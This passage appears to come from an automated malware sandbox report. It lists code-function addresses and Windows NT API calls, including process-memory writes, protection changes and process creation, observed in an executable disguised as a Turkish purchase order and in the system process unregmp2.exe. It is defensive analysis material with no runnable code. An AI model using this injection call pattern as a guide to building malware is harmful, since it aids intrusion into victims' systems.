Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_04572BA0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045735C0 NtCreateMutant,LdrInitializeThunk,	7_2_045735C0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045739B0 NtGetContextThread,LdrInitializeThunk,	7_2_045739B0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572C00 NtQueryInformationProcess,	7_2_04572C00
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572CC0 NtQueryVirtualMemory,	7_2_04572CC0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572CF0 NtOpenProcess,	7_2_04572CF0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572D00 NtSetInformationFile,	7_2_04572D00
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572DB0 NtEnumerateKey,	7_2_04572DB0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572E30 NtWriteVirtualMemory,	7_2_04572E30
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572EA0 NtAdjustPrivilegesToken,	7_2_04572EA0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572F60 NtCreateProcessEx,	7_2_04572F60
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572F90 NtProtectVirtualMemory,	7_2_04572F90
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572FA0 NtQuerySection,	7_2_04572FA0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572AB0 NtWaitForSingleObject,	7_2_04572AB0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572B80 NtQueryInformationFile,	7_2_04572B80
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04573010 NtOpenDirectoryObject,	7_2_04573010
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04573090 NtSetValueKey,	7_2_04573090
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04573D70 NtOpenThread,	7_2_04573D70
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04573D10 NtOpenProcessToken,	7_2_04573D10
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00438140 NtAllocateVirtualMemory,	7_2_00438140
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00437D00 NtCreateFile,	7_2_00437D00
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00437E60 NtReadFile,	7_2_00437E60
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00437F40 NtDeleteFile,	7_2_00437F40
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_00437FE0 NtClose,	7_2_00437FE0

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_00D8E3A4	0_2_00D8E3A4
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_00D825D8	0_2_00D825D8
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_04E70584	0_2_04E70584
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_04E724B0	0_2_04E724B0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_04E70920	0_2_04E70920
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_04E70910	0_2_04E70910
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C32EC3	0_2_06C32EC3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C32EF0	0_2_06C32EF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C39E20	0_2_06C39E20
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C34F9F	0_2_06C34F9F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C34FB0	0_2_06C34FB0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C33750	0_2_06C33750
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C33760	0_2_06C33760
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C33328	0_2_06C33328
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 0_2_06C36870	0_2_06C36870
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004010D0	5_2_004010D0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004168DE	5_2_004168DE
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004168E3	5_2_004168E3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0042D8B3	5_2_0042D8B3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004101C3	5_2_004101C3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0040E243	5_2_0040E243
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00401260	5_2_00401260
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00403210	5_2_00403210
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00401B8B	5_2_00401B8B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_00401B90	5_2_00401B90
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004024E0	5_2_004024E0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0040FF9B	5_2_0040FF9B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0040279D	5_2_0040279D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_004027A0	5_2_004027A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0040FFA3	5_2_0040FFA3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01458158	5_2_01458158
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C0100	5_2_013C0100
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146A118	5_2_0146A118
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014881CC	5_2_014881CC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014901AA	5_2_014901AA
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014841A2	5_2_014841A2
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01462000	5_2_01462000
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148A352	5_2_0148A352
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014903E6	5_2_014903E6
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DE3F0	5_2_013DE3F0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470274	5_2_01470274
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014502C0	5_2_014502C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0535	5_2_013D0535
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01490591	5_2_01490591
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01482446	5_2_01482446
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01474420	5_2_01474420
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147E4F6	5_2_0147E4F6
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0770	5_2_013D0770
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F4750	5_2_013F4750
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CC7C0	5_2_013CC7C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EC6E0	5_2_013EC6E0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E6962	5_2_013E6962
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D29A0	5_2_013D29A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0149A9A6	5_2_0149A9A6
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DA840	5_2_013DA840
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D2840	5_2_013D2840
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013B68B8	5_2_013B68B8
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013FE8F0	5_2_013FE8F0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148AB40	5_2_0148AB40
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01486BD7	5_2_01486BD7
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CEA80	5_2_013CEA80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DAD00	5_2_013DAD00
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146CD1F	5_2_0146CD1F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E8DBF	5_2_013E8DBF
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013CADE0	5_2_013CADE0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0C00	5_2_013D0C00
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C0CF2	5_2_013C0CF2
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01470CB5	5_2_01470CB5
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01444F40	5_2_01444F40
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013F0F30	5_2_013F0F30
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01412F28	5_2_01412F28
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01472F30	5_2_01472F30
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DCFE0	5_2_013DCFE0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0144EFA0	5_2_0144EFA0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C2FC8	5_2_013C2FC8
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D0E59	5_2_013D0E59
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148EE26	5_2_0148EE26
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148EEDB	5_2_0148EEDB
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013E2E90	5_2_013E2E90
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148CE93	5_2_0148CE93
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0149B16B	5_2_0149B16B
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0140516C	5_2_0140516C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BF172	5_2_013BF172
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013DB1B0	5_2_013DB1B0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147F0CC	5_2_0147F0CC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014870E9	5_2_014870E9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148F0E0	5_2_0148F0E0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D70C0	5_2_013D70C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148132D	5_2_0148132D
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013BD34C	5_2_013BD34C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0141739A	5_2_0141739A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D52A0	5_2_013D52A0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014712ED	5_2_014712ED
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EB2C0	5_2_013EB2C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01487571	5_2_01487571
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146D5B0	5_2_0146D5B0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013C1460	5_2_013C1460
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148F43F	5_2_0148F43F
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148F7B0	5_2_0148F7B0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014816CC	5_2_014816CC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01465910	5_2_01465910
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D9950	5_2_013D9950
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EB950	5_2_013EB950
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0143D800	5_2_0143D800
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D38E0	5_2_013D38E0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148FB76	5_2_0148FB76
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01445BF0	5_2_01445BF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0140DBF9	5_2_0140DBF9
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EFB80	5_2_013EFB80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148FA49	5_2_0148FA49
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01487A46	5_2_01487A46
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01443A6C	5_2_01443A6C
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0147DAC6	5_2_0147DAC6
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01415AA0	5_2_01415AA0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01471AA3	5_2_01471AA3
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0146DAAC	5_2_0146DAAC
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01481D5A	5_2_01481D5A
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01487D73	5_2_01487D73
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D3D40	5_2_013D3D40
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013EFDC0	5_2_013EFDC0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01449C32	5_2_01449C32
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148FCF2	5_2_0148FCF2
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148FF09	5_2_0148FF09
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D1F92	5_2_013D1F92
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0148FFB1	5_2_0148FFB1
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_013D9EB0	5_2_013D9EB0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F2446	7_2_045F2446
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045E4420	7_2_045E4420
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045EE4F6	7_2_045EE4F6
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04540535	7_2_04540535
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04600591	7_2_04600591
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0455C6E0	7_2_0455C6E0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04564750	7_2_04564750
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04540770	7_2_04540770
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0453C7C0	7_2_0453C7C0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045D2000	7_2_045D2000
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045C8158	7_2_045C8158
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045DA118	7_2_045DA118
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04530100	7_2_04530100
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F81CC	7_2_045F81CC
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_046001AA	7_2_046001AA
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F41A2	7_2_045F41A2
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045E0274	7_2_045E0274
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045C02C0	7_2_045C02C0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FA352	7_2_045FA352
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_046003E6	7_2_046003E6
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0454E3F0	7_2_0454E3F0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04540C00	7_2_04540C00
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04530CF2	7_2_04530CF2
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045E0CB5	7_2_045E0CB5
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045DCD1F	7_2_045DCD1F
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0454AD00	7_2_0454AD00
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0453ADE0	7_2_0453ADE0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04558DBF	7_2_04558DBF
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04540E59	7_2_04540E59
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FEE26	7_2_045FEE26
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FEEDB	7_2_045FEEDB
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04552E90	7_2_04552E90
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FCE93	7_2_045FCE93
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045B4F40	7_2_045B4F40
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04560F30	7_2_04560F30
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045E2F30	7_2_045E2F30
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04582F28	7_2_04582F28
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04532FC8	7_2_04532FC8
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0454CFE0	7_2_0454CFE0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045BEFA0	7_2_045BEFA0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0454A840	7_2_0454A840
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04542840	7_2_04542840
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0456E8F0	7_2_0456E8F0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045268B8	7_2_045268B8
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04556962	7_2_04556962
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0460A9A6	7_2_0460A9A6
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045429A0	7_2_045429A0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0453EA80	7_2_0453EA80
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FAB40	7_2_045FAB40
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F6BD7	7_2_045F6BD7
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04531460	7_2_04531460
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FF43F	7_2_045FF43F
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F7571	7_2_045F7571
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_046095C3	7_2_046095C3
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045DD5B0	7_2_045DD5B0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04585630	7_2_04585630
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F16CC	7_2_045F16CC
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FF7B0	7_2_045FF7B0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045EF0CC	7_2_045EF0CC
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045470C0	7_2_045470C0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F70E9	7_2_045F70E9
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FF0E0	7_2_045FF0E0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0460B16B	7_2_0460B16B
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0452F172	7_2_0452F172
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0457516C	7_2_0457516C
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0454B1B0	7_2_0454B1B0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0455B2C0	7_2_0455B2C0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045E12ED	7_2_045E12ED
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045452A0	7_2_045452A0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0452D34C	7_2_0452D34C
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F132D	7_2_045F132D
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_0458739A	7_2_0458739A
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045B9C32	7_2_045B9C32
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045FFCF2	7_2_045FFCF2
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_045F1D5A	7_2_045F1D5A
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04543D40	7_2_04543D40
